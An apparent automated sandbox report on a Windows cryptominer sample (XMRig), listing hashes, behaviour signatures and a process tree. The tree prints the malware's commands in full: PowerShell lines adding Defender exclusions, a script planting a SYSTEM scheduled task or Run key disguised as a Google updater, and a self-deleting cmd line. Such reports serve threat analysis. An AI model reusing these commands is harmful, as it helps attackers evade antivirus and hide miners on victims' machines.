Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
309s -
max time network
1787s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23-01-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 2916 created 1256 2916 Be5sCbvuma2nkHDa.exe 11 PID 2916 created 1256 2916 Be5sCbvuma2nkHDa.exe 11 PID 2916 created 1256 2916 Be5sCbvuma2nkHDa.exe 11 PID 2916 created 1256 2916 Be5sCbvuma2nkHDa.exe 11 PID 1204 created 1256 1204 updater.exe 11 PID 1204 created 1256 1204 updater.exe 11 PID 1204 created 1256 1204 updater.exe 11 PID 1204 created 1256 1204 updater.exe 11 PID 1204 created 1256 1204 updater.exe 11 -
XMRig Miner payload 29 IoCs
resource yara_rule behavioral7/memory/2840-72-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-74-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-78-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-105-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-107-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-109-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-111-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-113-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-115-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-132-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-134-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-136-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-138-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral7/memory/2840-140-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2576 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1204 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 664 taskeng.exe -
resource yara_rule behavioral7/memory/2840-67-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-72-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-74-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-78-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-105-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-107-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-109-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-111-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-113-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-115-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-132-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-134-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-136-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-138-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral7/memory/2840-140-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1204 set thread context of 1612 1204 updater.exe 55 PID 1204 set thread context of 2840 1204 updater.exe 53 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe Be5sCbvuma2nkHDa.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 108 schtasks.exe 2204 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1880 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 801e788db74fda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 2916 Be5sCbvuma2nkHDa.exe 2916 Be5sCbvuma2nkHDa.exe 1680 powershell.exe 2916 Be5sCbvuma2nkHDa.exe 2916 Be5sCbvuma2nkHDa.exe 2928 powershell.exe 2916 Be5sCbvuma2nkHDa.exe 2916 Be5sCbvuma2nkHDa.exe 2916 Be5sCbvuma2nkHDa.exe 2916 Be5sCbvuma2nkHDa.exe 2568 powershell.exe 1204 updater.exe 1204 updater.exe 2176 powershell.exe 1204 updater.exe 1204 updater.exe 2016 powershell.exe 1204 updater.exe 1204 updater.exe 1204 updater.exe 1204 updater.exe 1612 conhost.exe 1612 conhost.exe 1204 updater.exe 1204 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 1204 updater.exe Token: SeAssignPrimaryTokenPrivilege 1880 WMIC.exe Token: SeIncreaseQuotaPrivilege 1880 WMIC.exe Token: SeSecurityPrivilege 1880 WMIC.exe Token: SeTakeOwnershipPrivilege 1880 WMIC.exe Token: SeLoadDriverPrivilege 1880 WMIC.exe Token: SeSystemtimePrivilege 1880 WMIC.exe Token: SeBackupPrivilege 1880 WMIC.exe Token: SeRestorePrivilege 1880 WMIC.exe Token: SeShutdownPrivilege 1880 WMIC.exe Token: SeSystemEnvironmentPrivilege 1880 WMIC.exe Token: SeUndockPrivilege 1880 WMIC.exe Token: SeManageVolumePrivilege 1880 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1880 WMIC.exe Token: SeIncreaseQuotaPrivilege 1880 WMIC.exe Token: SeSecurityPrivilege 1880 WMIC.exe Token: SeTakeOwnershipPrivilege 1880 WMIC.exe Token: SeLoadDriverPrivilege 1880 WMIC.exe Token: SeSystemtimePrivilege 1880 WMIC.exe Token: SeBackupPrivilege 1880 WMIC.exe Token: SeRestorePrivilege 1880 WMIC.exe Token: SeShutdownPrivilege 1880 WMIC.exe Token: SeSystemEnvironmentPrivilege 1880 WMIC.exe Token: SeUndockPrivilege 1880 WMIC.exe Token: SeManageVolumePrivilege 1880 WMIC.exe Token: SeLockMemoryPrivilege 2840 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2928 wrote to memory of 2204 2928 powershell.exe 32 PID 2928 wrote to memory of 2204 2928 powershell.exe 32 PID 2928 wrote to memory of 2204 2928 powershell.exe 32 PID 2576 wrote to memory of 2472 2576 cmd.exe 34 PID 2576 wrote to memory of 2472 2576 cmd.exe 34 PID 2576 wrote to memory of 2472 2576 cmd.exe 34 PID 2568 wrote to memory of 1988 2568 powershell.exe 38 PID 2568 wrote to memory of 1988 2568 powershell.exe 38 PID 2568 wrote to memory of 1988 2568 powershell.exe 38 PID 664 wrote to memory of 1204 664 taskeng.exe 37 PID 664 wrote to memory of 1204 664 taskeng.exe 37 PID 664 wrote to memory of 1204 664 taskeng.exe 37 PID 2016 wrote to memory of 108 2016 powershell.exe 47 PID 2016 wrote to memory of 108 2016 powershell.exe 47 PID 2016 wrote to memory of 108 2016 powershell.exe 47 PID 1204 wrote to memory of 1612 1204 updater.exe 55 PID 1648 wrote to memory of 1880 1648 cmd.exe 50 PID 1648 wrote to memory of 1880 1648 cmd.exe 50 PID 1648 wrote to memory of 1880 1648 cmd.exe 50 PID 1204 wrote to memory of 2840 1204 updater.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2204
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:108
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1648
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1612
-
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2472
-
C:\Windows\system32\taskeng.exetaskeng.exe {87210586-8A34-4461-AB5D-6679A8609E8C} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1204
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC1⤵PID:1988
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"1⤵
- Drops file in Program Files directory
PID:1664
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
88KB
MD52b88b62253e1eff86f643fdd427377af
SHA1ff149d03a4af8eb304b8a47d23dacad0e8034324
SHA256fb664962a6581de621db8978a6d931aa3c2a77ae4edb63b96068748623e1321d
SHA512f03438178be9ea00934b2b7aecdc790d012362a83d664aae2e439d2cf244e225c690affde2ce5bb25706d03dbb7e4a17f15b3c1b6075c87fa048998d7db1a759
-
Filesize
32KB
MD5b638bd47f35631aad02c2415bc7d9995
SHA16b47431624ac5f2e2338924815aa214c715b45e1
SHA256a5b3a764d29210d6dbaf1c06b5d9edd0d3c04dfd736fbc5945614c328185cddd
SHA51234b22277e0bcd054720cf13d66c16c1ad4a346c81a6c7467edceccb6d88a8b6b38ca188ebfef62b090955a7802aef1910de8ca88d61b1d7f05382e43043db0a3
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FO21B7OD620R1VPQK0TT.temp
Filesize7KB
MD5e43f60587d14139f0c7a784dc20dc9a3
SHA1716206a74d13161195385e439ff4ef6daa6db8d3
SHA256992a22672ea29621133b9a8b099aeb89a25242dc66a68b0e4877f8ff2c75164e
SHA5121762227095fc3b38c086ac31c4de56d84953427ca9e92c6fcbbd91c3e791450852e14b352b09f77348602e26288ef45e35fc9233f60c6b9a9ff1fb0feeec5d5b
-
Filesize
67KB
MD5c3e8e0000dd9434e565bd2d4ca1dd04b
SHA180777e1a283ec5b279cc8adebddf9ec6321ac873
SHA25668dc34e266683ac9aea1f4e09cd10875b2ee1ffc20235f584404e7e95a2023e4
SHA512423b2e81af813ae545c402872a152a3429a0326fca335ffa27e10050199bd1b172c4f81ab8241785abdf5bac3c7ed36c4ddc7dbd87d28fda22c5fd346d3a5894